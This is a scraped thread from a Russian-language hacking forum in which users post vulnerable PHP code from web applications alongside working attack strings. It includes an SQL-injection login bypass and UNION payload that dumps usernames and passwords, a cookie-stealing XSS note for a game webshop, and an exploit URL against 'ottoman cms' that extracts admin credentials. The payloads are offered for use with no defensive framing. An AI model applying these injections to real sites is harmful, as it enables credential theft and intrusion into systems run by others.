if ([/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionIs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"authenticated"[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionGet[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"authenticated"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionIs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user_name"[/COLOR][COLOR="#007700"]) )
{
if ([/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"idle"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() );
}
else
{
[/COLOR][COLOR="#0000BB"]$_EXPCMS[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]session[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]SessionRegister[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"idle"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]);
}
}
}
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
В поле логина(если всетаки есть вывод ошибок):
Код:
Code:
admin'+OR+'pwd'='pwd'+UNION+SELECT+group_concat(user_id,0x3a,user_pass+separator+0x3c62723e),2+from+gry_users+--
ну, а если нет вывода - то как слепую(поля и таблица есть)
|
|
|
|
22.08.2011, 23:00
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Mu Online Advanced webshop alert(document.cookie)
При входе, логин/пасс(мд5) пишется в куки. Уязвимый код : inc/sajax.php
|
|
|
|
23.08.2011, 14:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
ottoman cms[SQL-Injection]
view.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
include[/COLOR][COLOR="#DD0000"]'header.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// Detect If User Is Logged In
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$logged_in[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$login_form[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"]; include[/COLOR][COLOR="#DD0000"]'login.php'[/COLOR][COLOR="#007700"]; }
else {
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];
switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])
{
case[/COLOR][COLOR="#0000BB"]article[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]// Top Menu
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"Article Viewer"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM articles WHERE id = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Article[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"private"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [private]"[/COLOR][COLOR="#007700"]; }
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"draft"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [draft]"[/COLOR][COLOR="#007700"]; }
...[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//temp/veiw.php?type=article&id=1+UNION+SELECT+1,group_concat(admin_user,0x3a,admin_pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+configuration+--
[/COLOR][/COLOR]
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
